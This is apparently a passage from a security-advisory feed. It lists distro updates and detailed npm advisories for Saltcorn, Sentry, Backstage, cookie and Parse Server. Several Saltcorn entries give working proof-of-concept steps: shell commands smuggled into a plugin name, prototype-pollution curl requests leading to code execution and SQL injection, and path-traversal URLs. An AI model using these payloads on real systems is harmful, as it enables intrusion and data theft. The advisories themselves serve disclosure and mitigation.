if (await this.prepPluginsFolder(force, pckJSON)) { // [8] [...] } async prepPluginsFolder(force, pckJSON) { [...] switch (this.plugin.source) { [...] case "git": if (force \|\| !(await pathExists(this.pluginDir))) { await gitPullOrClone(this.plugin, this.tempDir); // [9] [...] }```- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112```jsconst gitPullOrClone = async (plugin, pluginDir) => { [...] if (fs.existsSync(pluginDir)) { execSync(`git ${setKey} -C ${pluginDir} pull`); } else { execSync(`git ${setKey} clone ${plugin.location} ${pluginDir}`); // [10] } [...]};```### PoC- check that the file will be created by the command `echo "hello">/tmp/HACKED` does not exists:```cat /tmp/HACKEDcat: /tmp/HACKED: No such file or directory```- login with an admin account- visit `http://localhost:3000/plugins/new`- enter the following fields: - Name: `;echo "hello">/tmp/HACKED` - Source: `git` - other fields blank- click `Create`- you will get an error saying `ENOENT: no such file or directory, ....` but the command `touch /tmp/HACKED` will be executed- to verify:```cat /tmp/HACKEDhello```### ImpactRemote code execution### Recommended MitigationSanitize the `pluginDir` value before passing to `execSync`. Alternatively, use `child_process. execFileSync` API (docs: https://nodejs.org/api/child_process.html#child_processexecfilesyncfile-args-options)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FM76-W8JW-XF8M
03.10.2024 22:51:00	npm	[NPM:GHSA-78P3-FWCQ-62C2] @saltcorn/server Remote Code Execution (RCE) / SQL injection via prototype pollution by manipulating `lang` and `defstring` parameters when setting localizer strings (high)	### SummaryThe endpoint `/site-structure/localizer/save-string/:lang/:defstring` accepts two parameter values: `lang` and `defstring`. These values are used in an unsafe way to set the keys and value of the `cfgStrings` object. It allows to add/modify properties of the `Object prototype` that result in several logic issues, including:- RCE vulnerabilities by polluting the `tempRootFolder` property - SQL injection vulnerabilities by polluting the `schema` property when using `PostgreSQL` database.### Details- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239```jsrouter.post( "/localizer/save-string/:lang/:defstring", isAdmin, error_catcher(async (req, res) => { const { lang, defstring } = req.params; // source const cfgStrings = getState().getConfigCopy("localizer_strings"); if (cfgStrings[lang]) cfgStrings[lang][defstring] = text(req.body.value); // [1] sink else cfgStrings[lang] = { [defstring]: text(req.body.value) }; await getState().setConfig("localizer_strings", cfgStrings); res.redirect(`/site-structure/localizer/edit/${lang}`); }));```### PoCSetup:- set `SALTCORN_NWORKERS=1` before starting the `saltcorn` server (to easily observe the behavior of the PoC)```SALTCORN_NWORKERS=1 saltcorn serve```- make sure to use PostgresSQL backend- login with a user with admin permission#### RCEThis PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain command executed.- check that the file that will be created does not exists:```cat /tmp/RCEcat: /tmp/RCE: No such file or directory```- pollute the `Object.prototype` with a `tempRootFolder` value set to `;echo+"rce"\|tee+/tmp/RCE;` by sending the following request *** :```bashcurl -i -X $'POST' \ -H $'Host: localhost:3000' \ -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: /' \ -H $'Origin: http://localhost:3000' \ -H $'Connection: close' \ -b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \ --data-binary $'_csrf=VALID_csrf_Value&value=;echo+"rce"\|tee+/tmp/RCE;' \ $'http://localhost:3000/site-structure/localizer/save-string/__proto__/tempRootFolder'``` visit `http://localhost:3000/plugins/new`- enter the following fields: - Name: `test` - Source: `git` - other fields blank - click `Create`- you will get an error but the command `echo "rce" \| tee /tmp/RCE` will be executed- to verify:```cat /tmp/RCErce```The RCE occurs because after the previous curl request, the `tempRootFolder` property is set to `;echo+"rce"\|tee+/tmp/RCE;` that is later used to build the shell commands.- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58```jsclass PluginInstaller { constructor(plugin, opts = {}) { // opts will have the tempRootFolder property set with dangerous values // [2] [...] this.tempRootFolder = opts.tempRootFolder \|\| envPaths("saltcorn", { suffix: "tmp" }).temp; // [3] [...] this.pckJsonPath = join(this.pluginDir, "package.json"); this.tempDir = join(this.tempRootFolder, "temp_install", ...tokens); // [4] [...] } [...]}```#### SQL InjectionThis PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain SQL queries (i.e SQLi).- visit `http://localhost:3000/table` to check the page returns some results (no errors)- pollute the `Object.prototype` with a schema value set to `"` (just to create an exception in the query that will be executed to demonstrate the issue) by sending the following request *** :```curl -i -X $'POST' \ -H $'Host: localhost:3000' \ -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: /' \ -H $'Origin: http://localhost:3000' \ -H $'Connection: close' \ -b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \ --data-binary $'_csrf=VALID_csrf_Value&value=\"' \ $'http://localhost:3000/site-structure/localizer/save-string/__proto__/schema'```- visit again `http://localhost:3000/table` but this time an SQL error will appear:```syntax error at or near "" order by lower(""```NOTE: Another payload to use as `value` could be `pg_user"+WHERE+1=1+AND+(SELECT+pg_sleep(5))+IS+NOT+NULL+--`The SQL injection occurs because after the previous curl request, the `schema` property is set to `"`.- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101```jsconst select = async (tbl, whereObj, selectopts = {}) => { // [2] selectopts const { where, values } = mkWhere(whereObj); const schema = selectopts.schema \|\| getTenantSchema(); // [3] selectopts.schema const sql = `SELECT ${ selectopts.fields ? selectopts.fields.join(", ") : `` } FROM "${schema}"."${sqlsanitize(tbl)}" ${where} ${mkSelectOptions( // [4] schema selectopts, values, false )}`; sql_log(sql, values); const tq = await (client \|\| selectopts.client \|\| pool).query(sql, values); return tq.rows;};```** Retrieve valid values for the `connect.sid` (`VALID_CONNECT_SID_COOKIE`) and `_csrf` values (`VALID_csrf_Value`) :- open the browser developer console and go to the `Network` tab- visit `http://localhost:3000/site-structure/localizer/add-lang`- add a language (`Name: test` , `Locale: test`) and click `Save`- under the `Network` tab, filter for `save-lang` and check the request parameters (`Headers` and `Payload`/`Request` tabs)- copy the values for `connect.sid` and `_csrf` and paste in the curl command above### ImpactRemote code execution (RCE), Sql injection and business logic errors.### Recommended MitigationCheck the values of `lang` and `defstring` parameters against dangerous properties like `__proto__`, `constructor`, `prototype`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-78P3-FWCQ-62C2
03.10.2024 22:46:45	npm	[NPM:GHSA-CFQX-F43M-VFH7] @saltcorn/server arbitrary file and directory listing when accessing build mobile app results (moderate)	### SummaryA user with admin permission can read arbitrary file and directory names on the filesystem by calling the `admin/build-mobile-app/result?build_dir_name=` endpoint. The `build_dir_name` parameter is not properly validated and it's then used to construct the `buildDir` that is read. The file/directory names under the `buildDir` will be returned. ### Details- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L2884-L2893```jsrouter.get( "/build-mobile-app/result", isAdmin, error_catcher(async (req, res) => { const { build_dir_name } = req.query; // [1] source const rootFolder = await File.rootFolder(); const buildDir = path.join( rootFolder.location, "mobile_app", build_dir_name // [2] ); const files = await Promise.all( fs .readdirSync(buildDir) // [3] sink .map(async (outFile) => await File.from_file_on_disk(outFile, buildDir)) ); [...] }));```### PoC- log into the application as an admin user- visit the following url: `http://localhost:3000/admin/build-mobile-app/result?build_dir_name=/../../../../../../../../`NOTE: it's possible to only see file and directory names but not to download their content.### ImpactInformation disclosure### Recommended MitigationResolve the `buildDir` and check if it starts with `${rootFolder.location}/mobile_app`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CFQX-F43M-VFH7
03.10.2024 22:46:15	npm	[NPM:GHSA-277H-PX4M-62Q8] @saltcorn/server arbitrary file zip read and download when downloading auto backups (moderate)	### SummaryA user with admin permission can read and download arbitrary zip files when downloading auto backups. The file name used to identify the zip file is not properly sanitized when passed to `res.download` API.### Details- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L671-L682```jsrouter.get( "/auto-backup-download/:filename", isAdmin, error_catcher(async (req, res) => { const { filename } = req.params; // [1] source [...] if ( !isRoot \|\| !(filename.startsWith(backup_file_prefix) && filename.endsWith(".zip")) // [2] ) { res.redirect("/admin/backup"); return; } const auto_backup_directory = getState().getConfig("auto_backup_directory"); res.download(path.join(auto_backup_directory, filename), filename); // [3] sink }));```### Steps to reproduce (PoC)- create a file with `.zip` extension under `/tmp` folder:```echo "secret12345" > /tmp/secret.zip```- log into the application as an admin user- visit the url `http://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip`- download the zip file and then check if the zip was indeed downloaded:```bashcat secret.zipsecret12345``` - Alternatively send the following request to retrieve the file just created.```bashcurl -i -X $'GET' \ -H $'Host: localhost:3000' \ -H $'Connection: close' \ -b $'connect.sid=VALID_CONNECT_SID_COOKIE' \ $'http://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip'```NOTE:To obtain a valid `connect.sid` cookie, just open the developer console while logged and retrieve the cookie value.### ImpactArbitrary zip files download (information disclosure).### Recommended MitigationResolve the `filename` parameter before checking if it starts with `backup_file_prefix` .	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-277H-PX4M-62Q8
03.10.2024 21:26:53	npm	[NPM:GHSA-593M-55HH-J8GV] Sentry SDK Prototype Pollution gadget in JavaScript SDKs (moderate)	### ImpactIn case a Prototype Pollution vulnerability is present in a user's application or bundled libraries, the Sentry SDK could potentially serve as a gadget to exploit that vulnerability. The exploitability depends on the specific details of the underlying Prototype Pollution issue.> [!NOTE]> This advisory does not indicate the presence of a Prototype Pollution within the Sentry SDK itself. Users are strongly advised to first address any Prototype Pollution vulnerabilities in their application, as they pose a more critical security risk.### PatchesThe issue was patched in all Sentry JavaScript SDKs starting from the [8.33.0](https://github.com/getsentry/sentry-javascript/releases/tag/8.33.0) version.### References* [Prototype Pollution](https://portswigger.net/web-security/prototype-pollution)* [Prototype Pollution gadgets](https://portswigger.net/web-security/prototype-pollution#prototype-pollution-gadgets)* [sentry-javascript#13838](https://github.com/getsentry/sentry-javascript/pull/13838)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-593M-55HH-J8GV
03.10.2024 21:41:12	npm	[NPM:GHSA-QC4V-XQ2M-65WC] Unexpected visibility of environment variable configurations in @backstage/plugin-app-backend (moderate)	### ImpactConfiguration supplied through `APP_CONFIG_` environment variables, for example `APP_CONFIG_backend_listen_port=7007`, where unexpectedly ignoring the visibility defined in configuration schema. This occurred even if the configuration schema specified that they should have backend or secret visibility. This was an intended feature of the `APP_CONFIG_` way of supplying configuration, but now clearly goes against the expected behavior of the configuration system. This behavior leads to a risk of potentially exposing sensitive configuration details intended to remain private or restricted to backend processes.### PatchesThe issue has been resolved in version `0.3.75` of the `@backstage/plugin-app-backend` package. Users are encouraged to upgrade to this version to mitigate the vulnerability.### WorkaroundsAs a temporary measure, avoid supplying secrets using the `APP_CONFIG_` configuration pattern. Consider alternative methods for setting secrets, such as the [environment substitution](https://backstage.io/docs/conf/writing#environment-variable-substitution) available for Backstage configuration.### ReferencesIf you have any questions or comments about this advisory:Open an issue in the [Backstage repository](https://github.com/backstage/backstage)Visit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QC4V-XQ2M-65WC
03.10.2024 17:24:55	ubuntu	[USN-7055-1] FreeRADIUS vulnerability	A system authentication measure could be bypassed.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7055-1
03.10.2024 17:10:36	ubuntu	[USN-7053-1] ImageMagick vulnerabilities	Several security issues were fixed in ImageMagick.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7053-1
03.10.2024 16:06:07	suse	[SUSE-SU-2024:3519-1] Security update for MozillaFirefox (important)	Security update for MozillaFirefox	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3519-1
03.10.2024 16:04:32	suse	[SUSE-SU-2024:3518-1] Security update for MozillaFirefox (important)	Security update for MozillaFirefox	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3518-1
03.10.2024 19:52:56	maven	[MAVEN:GHSA-R7PG-V2C8-MFG3] Apache Avro Java SDK: Arbitrary Code Execution when reading Avro Data (Java SDK) (critical)	Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute arbitrary code.Users are recommended to upgrade to version 1.11.4 or 1.12.0, which fix this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R7PG-V2C8-MFG3
03.10.2024 19:52:26	maven	[MAVEN:GHSA-78WR-2P64-HPWJ] Apache Commons IO: Possible denial of service attack on untrusted input to XmlStreamReader (high)	Uncontrolled Resource Consumption vulnerability in Apache Commons IO.The `org.apache.commons.io.input.XmlStreamReader` class may excessively consume CPU resources when processing maliciously crafted input.This issue affects Apache Commons IO: from 2.0 before 2.14.0.Users are recommended to upgrade to version 2.14.0 or later, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-78WR-2P64-HPWJ
03.10.2024 15:03:40	suse	[SUSE-SU-2024:3517-1] Security update for opensc (low)	Security update for opensc	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3517-1
03.10.2024 14:53:28	ubuntu	[USN-7054-1] unzip vulnerability	unzip could be made to crash or run programs as your login if it opened aspecially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7054-1
03.10.2024 14:33:45	suse	[SUSE-SU-2024:3516-1] Security update for libpcap (moderate)	Security update for libpcap	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3516-1
03.10.2024 14:33:36	suse	[SUSE-SU-2024:3515-1] Security update for expat (moderate)	Security update for expat	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3515-1
05.10.2024 04:54:15	fedora	[FEDORA-2024-452b60addf] Fedora 40: chromium (high)	update to 129.0.6668.89High CVE-2024-7025: Integer overflow in LayoutHigh CVE-2024-9369: Insufficient data validation in MojoHigh CVE-2024-9370: Inappropriate implementation in V8	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-452b60addf
05.10.2024 03:18:01	fedora	[FEDORA-2024-7908ee39a9] Fedora 41: aws (high)	CVE-2024-41708: Ada Web Server did not use a cryptographically securepseudorandom number generator.AWS.Utils.Random and AWS.Utils.Random_String used Ada.Numerics.Discrete_Random,which is not designed to be cryptographically secure. Random_String alsointroduced a bias in the generated pseudorandom string values, where the values"1" and "2" had a much higher frequency than any other character.The internal state of the Mersenne Twister PRNG could be revealed, and lead to asession hijacking attack.This update fixes the problem by using /dev/urandom instead of Discrete_Random.More details: https://docs.adacore.com/corp/security-advisories/SEC.AWS-0040-v2.pdf	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7908ee39a9
05.10.2024 03:17:57	fedora	[FEDORA-2024-9e55564ca7] Fedora 41: python-gcsfs (medium)	Update to new upstream version (closes rhbz#2237124)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9e55564ca7
05.10.2024 03:17:49	fedora	[FEDORA-2024-1c078a4771] Fedora 41: znc, znc-push, znc-clientbuffer (critical)	Fix CVE-2024-39844https://wiki.znc.in/ChangeLog/1.9.0	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1c078a4771
04.10.2024 23:31:01	npm	[NPM:GHSA-PXG6-PF52-XH8X] cookie accepts cookie name, path, and domain with out of bounds characters (low)	### ImpactThe cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, `serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value)` would result in `"userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test"`, setting `userName` cookie to `<script>` and ignoring `value`.A similar escape can be used for `path` and `domain`, which could be abused to alter other fields of the cookie.### PatchesUpgrade to 0.7.0, which updates the validation for `name`, `path`, and `domain`.### WorkaroundsAvoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.### References* https://github.com/jshttp/cookie/pull/167	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PXG6-PF52-XH8X
04.10.2024 21:50:57	npm	[NPM:GHSA-8XQ9-G7CH-35HG] Parse Server's custom object ID allows to acquire role privileges (high)	### ImpactIf the Parse Server option `allowCustomObjectId: true` is set, an attacker that is allowed to create a new user can set a custom object ID for that new user that exploits the vulnerability and acquires privileges of a specific role.### PatchesImproved validation for custom user object IDs. Session tokens for existing users with an object ID that exploits the vulnerability are now rejected.### Workarounds- Disable custom object IDs by setting `allowCustomObjectId: false` or not setting the option which defaults to `false`.- Use a Cloud Code Trigger to validate that a new user's object ID doesn't start with the prefix `role:`.### References- https://github.com/parse-community/parse-server/security/advisories/GHSA-8xq9-g7ch-35hg- https://github.com/parse-community/parse-server/pull/9317 (fix for Parse Server 7)- https://github.com/parse-community/parse-server/pull/9318 (fix for Parse Server 6)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8XQ9-G7CH-35HG
04.10.2024 17:40:29	suse	[SUSE-SU-2024:3533-1] Security update for pcp (important)	Security update for pcp	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3533-1
04.10.2024 17:29:54	suse	[SUSE-SU-2024:3532-1] Security update for openvpn (moderate)	Security update for openvpn	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3532-1
04.10.2024 16:30:11	suse	[SUSE-SU-2024:3458-1] Security update for kubernetes1.24 (important)	Security update for kubernetes1.24	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3458-1
04.10.2024 16:28:41	suse	[SUSE-SU-2024:3453-1] Security update for kubernetes1.24 (important)	Security update for kubernetes1.24	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3453-1
04.10.2024 16:25:20	suse	[SUSE-SU-2024:3526-1] Security update for Mesa (moderate)	Security update for Mesa	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3526-1
04.10.2024 16:21:09	suse	[SUSE-SU-2024:3525-1] Security update for openssl-3 (important)	Security update for openssl-3	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3525-1
04.10.2024 16:18:41	suse	[SUSE-SU-2024:3524-1] Security update for frr (important)	Security update for frr	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3524-1
04.10.2024 16:17:15	suse	[SUSE-SU-2024:3523-1] Security update for cups-filters (critical)	Security update for cups-filters	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3523-1
04.10.2024 21:51:46	maven	[MAVEN:GHSA-WWCP-26WC-3FXM] JSON-lib mishandles an unbalanced comment string (moderate)	util/JSONTokener.java in JSON-lib before 3.1.0 mishandles an unbalanced comment string.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WWCP-26WC-3FXM
04.10.2024 08:27:10	almalinux	[ALSA-2024:7505] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7505
04.10.2024 08:25:09	almalinux	[ALSA-2024:7552] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7552
04.10.2024 15:13:50	rubysec	[RUBYSEC:OPENC3-2024-43795] OpenC3 Cross-site Scripting in Login functionality (`GHSL-2024-128`)	### SummaryThe login functionality contains a reflected cross-site scripting(XSS) vulnerability.Note: This CVE only affects Open Source Edition, and notOpenC3 COSMOS Enterprise Edition### ImpactThis issue may lead up to Remote Code Execution (RCE).NOTE: The complete advisory with much more information is added as[comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g#advisory-comment-104904).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:OPENC3-2024-43795
04.10.2024 15:13:50	rubysec	[RUBYSEC:OPENC3-2024-46977] OpenC3 Path Traversal via screen controller (`GHSL-2024-127`)	### SummaryA path traversal vulnerability inside of `LocalMode`'s`open_local_file` method allows an authenticated user withadequate permissions to download any `.txt` via the`ScreensController#show` on the web server COSMOS is runningon (depending on the file permissions).Note: This CVE affects all OpenC3 COSMOS Editions### ImpactThis issue may lead to Information Disclosure.NOTE: The complete advisory with much more information is added as[comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-8jxr-mccc-mwg8#advisory-comment-104903).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:OPENC3-2024-46977
04.10.2024 15:13:50	rubysec	[RUBYSEC:OPENC3-2024-47529] OpenC3 stores passwords in clear text (`GHSL-2024-129`) (medium)	### SummaryOpenC3 COSMOS stores the password of a user unencrypted in theLocalStorage of a web browser. This makes the user passwordsusceptible to exfiltration via Cross-site scripting (see GHSL-2024-128).Note: This CVE only affects Open Source edition, and notOpenC3 COSMOS Enterprise Edition### ImpactThis issue may lead to Information Disclosure.NOTE: The complete advisory with much more information is added as[comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-4xqv-47rm-37mm#advisory-comment-104905).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:OPENC3-2024-47529
06.10.2024 05:12:53	fedora	[FEDORA-2024-5c99e1d579] Fedora 40: p7zip	Fix wrapper to hide password from process history	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5c99e1d579
06.10.2024 05:12:52	fedora	[FEDORA-2024-c07e065747] Fedora 40: unbound (medium)	Fixes CVE-2024-8508https://github.com/NLnetLabs/unbound/releases/tag/release-1.21.1	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c07e065747
06.10.2024 05:12:26	fedora	[FEDORA-2024-63f98f8c60] Fedora 40: aws (high)	CVE-2024-41708: Ada Web Server did not use a cryptographically securepseudorandom number generator.AWS.Utils.Random and AWS.Utils.Random_String used Ada.Numerics.Discrete_Random,which is not designed to be cryptographically secure. Random_String alsointroduced a bias in the generated pseudorandom string values, where the values"1" and "2" had a much higher frequency than any other character.The internal state of the Mersenne Twister PRNG could be revealed, and lead to asession hijacking attack.This update fixes the problem by using /dev/urandom instead of Discrete_Random.More details: https://docs.adacore.com/corp/security-advisories/SEC.AWS-0040-v2.pdf	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-63f98f8c60
06.10.2024 04:26:37	fedora	[FEDORA-2024-7aba3c1531] Fedora 39: chromium (high)	update to 129.0.6668.89High CVE-2024-7025: Integer overflow in LayoutHigh CVE-2024-9369: Insufficient data validation in MojoHigh CVE-2024-9370: Inappropriate implementation in V8	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7aba3c1531
06.10.2024 04:26:27	fedora	[FEDORA-2024-d940f25a53] Fedora 39: aws (high)	CVE-2024-41708: Ada Web Server did not use a cryptographically securepseudorandom number generator.AWS.Utils.Random and AWS.Utils.Random_String used Ada.Numerics.Discrete_Random,which is not designed to be cryptographically secure. Random_String alsointroduced a bias in the generated pseudorandom string values, where the values"1" and "2" had a much higher frequency than any other character.The internal state of the Mersenne Twister PRNG could be revealed, and lead to asession hijacking attack.This update fixes the problem by using /dev/urandom instead of Discrete_Random.More details: https://docs.adacore.com/corp/security-advisories/SEC.AWS-0040-v2.pdf	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d940f25a53
06.10.2024 03:14:43	fedora	[FEDORA-2024-b142cc07d0] Fedora 41: webkitgtk (medium)	Fix login QR code not shown in WhatsApp web.Disable PSON by default again in GTK 3 API versions.Disable DMABuf video sink by default to prevent file descriptor leaks.Fix several crashes and rendering issues.Use Skia instead of cairo for 2D rendering and enable GPU rendering by default.Enable offscreen canvas by default.Add support for system tracing with Sysprof.Implement printing using the Print portal.Add new API to load settings from a config file.Add a new setting to enable or disable the 2D canvas acceleration (enabled bydefault).Undeprecate console messages API and make it available in 6.0 API.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b142cc07d0
05.10.2024 14:36:30	rubysec	[RUBYSEC:OPENC3-2024-43795] OpenC3 Cross-site Scripting in Login functionality (`GHSL-2024-128`) (medium)	### SummaryThe login functionality contains a reflected cross-site scripting(XSS) vulnerability.Note: This CVE only affects Open Source Edition, and notOpenC3 COSMOS Enterprise Edition### ImpactThis issue may lead up to Remote Code Execution (RCE).NOTE: The complete advisory with much more information is added as[comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g#advisory-comment-104904).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:OPENC3-2024-43795
05.10.2024 14:36:30	rubysec	[RUBYSEC:OPENC3-2024-46977] OpenC3 Path Traversal via screen controller (`GHSL-2024-127`) (medium)	### SummaryA path traversal vulnerability inside of `LocalMode`'s`open_local_file` method allows an authenticated user withadequate permissions to download any `.txt` via the`ScreensController#show` on the web server COSMOS is runningon (depending on the file permissions).Note: This CVE affects all OpenC3 COSMOS Editions### ImpactThis issue may lead to Information Disclosure.NOTE: The complete advisory with much more information is added as[comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-8jxr-mccc-mwg8#advisory-comment-104903).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:OPENC3-2024-46977
07.10.2024 12:41:38	ubuntu	[USN-7043-3] cups-filters vulnerability	cups-filters could be made to run programs if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7043-3
07.10.2024 11:42:52	ubuntu	[USN-7041-3] CUPS vulnerability	CUPS could be made to crash or run programs if it received speciallycrafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7041-3
07.10.2024 06:43:04	ubuntu	[USN-7056-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7056-1
07.10.2024 04:17:51	fedora	[FEDORA-2024-86edbf4d85] Fedora 39: firefox	New upstream version (131.0)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-86edbf4d85
07.10.2024 03:16:16	fedora	[FEDORA-2024-4944ad2c87] Fedora 41: pgadmin4 (critical)	Fix CVE-2024-9014.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4944ad2c87
08.10.2024 04:48:58	fedora	[FEDORA-2024-e1357fc22f] Fedora 39: webkitgtk (medium)	Fix login QR code not shown in WhatsApp web.Disable PSON by default again in GTK 3 API versions.Disable DMABuf video sink by default to prevent file descriptor leaks.Fix several crashes and rendering issues.Use Skia instead of cairo for 2D rendering and enable GPU rendering by default.Enable offscreen canvas by default.Add support for system tracing with Sysprof.Implement printing using the Print portal.Add new API to load settings from a config file.Add a new setting to enable or disable the 2D canvas acceleration (enabled bydefault).Undeprecate console messages API and make it available in 6.0 API.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e1357fc22f
08.10.2024 04:38:58	fedora	[FEDORA-2024-4c6304b6fa] Fedora 40: webkitgtk (medium)	Fix login QR code not shown in WhatsApp web.Disable PSON by default again in GTK 3 API versions.Disable DMABuf video sink by default to prevent file descriptor leaks.Fix several crashes and rendering issues.Use Skia instead of cairo for 2D rendering and enable GPU rendering by default.Enable offscreen canvas by default.Add support for system tracing with Sysprof.Implement printing using the Print portal.Add new API to load settings from a config file.Add a new setting to enable or disable the 2D canvas acceleration (enabled bydefault).Undeprecate console messages API and make it available in 6.0 API.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4c6304b6fa
07.10.2024 18:14:41	npm	[NPM:GHSA-PF56-H9QF-RXQ4] Saltcorn Server Stored Cross-Site Scripting (XSS) in event logs page (moderate)	### SummaryEvent log data is not properly sanitized leading to stored Cross-Site Scripting (XSS) vulnerability.### Details- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/eventlog.js#L445```jsrouter.get( "/:id", isAdmin, error_catcher(async (req, res) => { const { id } = req.params; const ev = await EventLog.findOneWithUser(id); send_events_page({ [...] contents: { type: "card", contents: [...] ) + div( { class: "eventpayload" }, ev.payload ? pre(JSON.stringify(ev.payload, null, 2)) : "" //<--- ), }, }); })```### PoCThe following PoC demonstrates how a non-admin user with permission to read/write on a table can inject malicious javascript code that will be executed in the event log admin panel if event logs are enabled.To demonstrate this issue, we need to prepare some components. The following steps should be executed with an admin user.1. create a table with one column of type string set read/write permission to staff users (just as an example) - visit `http://localhost:3000/table/new` - create a table with `Table name` `my_table_xss` and click `Create` - click `Add field` to add a field with `Label` called `payload` of type `String` and click `Next >>` - leave default values for `Attributes` and click `Next >>` - it should redirect to `http://localhost:3000/table/<table-number>` - under `Edit table properties`, set `Minimum role to read` and `Minimum role to write` to `staff`2. create an edit view so that staff users can insert more data - visit `http://localhost:3000/viewedit` anc click `Create View` - set the following values: - `View name`: `my_xss_view` - `View pattern`: `Edit` - `Table`: `my_table_xss` - `Minimum role`: `staff` - click `Configure >>` - on page `http://localhost:3000/viewedit/config/my_xss_view` click `Next >>` and then `Finish >>` - you should see a message `View my_xss_view saved`3. edit the site structure to add the View just created so that `staff` users can access it - visit `http://localhost:3000/menu` - set the following values: - `Type`: `View` - `View`: `my_xss_view [Edit]` - `Text label`: `view` - `Minimum role`: `staff` - click `Add`4. create an event that will log when data is inserted in the `my_table_xss` table create at step 1 - visit `http://localhost:3000/eventlog/settings` - under `Which events should be logged?` select: - `[X] Insert` - `[X] Insert my_table_xss`Login with a 